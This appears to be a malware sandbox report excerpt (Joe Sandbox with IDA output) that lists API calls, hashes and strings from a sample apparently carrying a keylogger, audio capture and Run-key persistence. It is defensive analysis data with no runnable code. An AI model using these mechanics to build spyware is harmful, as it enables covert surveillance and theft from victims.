                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ACP$OCP
                              • API String ID: 0-711371036
                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                              APIs
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                              • String ID: image/png
                              • API String ID: 1291196975-2966254431
                              • Opcode ID: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                              • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                              • Opcode Fuzzy Hash: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                              • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                              APIs
                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                              Strings
                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: KeepAlive | Enabled | Timeout:
                              • API String ID: 481472006-1507639952
                              • Opcode ID: 17f6677c4349498a975024044c14d9a5c316ee35d9cd9886d2c8e963fff4f96f
                              • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                              • Opcode Fuzzy Hash: 17f6677c4349498a975024044c14d9a5c316ee35d9cd9886d2c8e963fff4f96f
                              • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: LG$XG
                              • API String ID: 0-1482930923
                              • Opcode ID: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                              • Instruction ID: b803d8f2fb0d60b71c32d24796bf113498d2ea24005d64aa96dbf80bf0db992b
                              • Opcode Fuzzy Hash: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                              • Instruction Fuzzy Hash: CE11A3B1D01654AACB20EFA998017CFB7A55F09725F14D06BED18EF281D3B9DB408B98
                              APIs
                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime
                              • String ID: | $%02i:%02i:%02i:%03i
                              • API String ID: 481472006-2430845779
                              • Opcode ID: 9b95a0a033af4e6b3b54331b4a103e7e6270c3a9d1cca9dd8a72674f32e816fd
                              • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                              • Opcode Fuzzy Hash: 9b95a0a033af4e6b3b54331b4a103e7e6270c3a9d1cca9dd8a72674f32e816fd
                              • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                              APIs
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: QueryValue
                              • String ID: TUF
                              • API String ID: 3660427363-3431404234
                              • Opcode ID: 3b78be7274fe7523ce167e025b78789c7b39fba0dda90363f1a256c0226bf42c
                              • Instruction ID: 62a4949b47554db758ef5e9b715c6ec4cc130d120bf99ac1ec1555789b8052d8
                              • Opcode Fuzzy Hash: 3b78be7274fe7523ce167e025b78789c7b39fba0dda90363f1a256c0226bf42c
                              • Instruction Fuzzy Hash: BC01A7B6A00108BFDB049B95DD46EFF7ABDDF44240F10007AF901E2251E6749F009664
                              APIs
                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                              • String ID: Online Keylogger Stopped
                              • API String ID: 1623830855-1496645233
                              • Opcode ID: 39cace8de3b71b1ab7e2389c94fa8a099f32ea781476cbb4ed9a2e65fdbab590
                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                              • Opcode Fuzzy Hash: 39cace8de3b71b1ab7e2389c94fa8a099f32ea781476cbb4ed9a2e65fdbab590
                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                              APIs
                              • waveInPrepareHeader.WINMM(005DDDE8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                              • waveInAddBuffer.WINMM(005DDDE8,00000020,?,00000000,00401913), ref: 0040175D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$BufferHeaderPrepare
                              • String ID: Ho]
                              • API String ID: 2315374483-1987534667
                              • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                              • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                              APIs
                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocaleValid
                              • String ID: IsValidLocaleName$j=D
                              • API String ID: 1901932003-3128777819
                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                              APIs
                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                              • String ID: [AltL]$[AltR]
                              • API String ID: 2738857842-2658077756
                              • Opcode ID: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                              • Opcode Fuzzy Hash: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                              APIs
                              • _free.LIBCMT ref: 00448825
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFreeHeapLast_free
                              • String ID: `@$`@
                              • API String ID: 1353095263-20545824
                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                              APIs
                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: State
                              • String ID: [CtrlL]$[CtrlR]
                              • API String ID: 1649606143-2446555240
                              • Opcode ID: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                              • Opcode Fuzzy Hash: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                              • API String ID: 2654517830-1051519024
                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                              APIs
                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteDirectoryFileRemove
                              • String ID: pth_unenc
                              • API String ID: 3325800564-4028850238
                              • Opcode ID: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                              • Opcode Fuzzy Hash: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                              APIs
                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ObjectProcessSingleTerminateWait
                              • String ID: pth_unenc
                              • API String ID: 1872346434-4028850238
                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CommandLine
                              • String ID: @)\
                              • API String ID: 3253501508-2839598822
                              • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                              • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                              • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                              • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                              • GetLastError.KERNEL32 ref: 0043FB02
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLast
                              • String ID:
                              • API String ID: 1717984340-0
                              • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                              • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759